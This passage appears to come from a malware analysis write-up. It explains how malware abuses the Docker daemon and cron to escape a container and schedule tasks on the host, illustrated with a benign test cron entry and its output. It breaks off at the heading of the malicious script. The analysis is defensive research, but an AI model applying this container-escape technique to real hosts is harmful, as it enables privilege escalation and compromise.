An important question now is whether the crontab job was created inside the (now destroyed) Docker container or on the host. If we check the root’s crontab on the host, it will tell us that the task was scheduled for the host’s root, to be run on the host:

$ sudo crontab -l
* * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1

A minute later, the file _123.txt shows up in the host’s root directory, and the scheduled entry disappears from the root’s crontab on the host:

$ sudo crontab -l
no crontab for root

This simple exercise proves that while the malware executes the malicious script inside the spawned container, insulated from the host, the actual task it schedules is created and then executed on the host.
By using the cron job trick, the malware manipulates the Docker daemon into executing the malware directly on the host!

Malicious Script

Upon escaping from the container to be executed directly on a remote compromised host, the malicious script will perform the following actions:
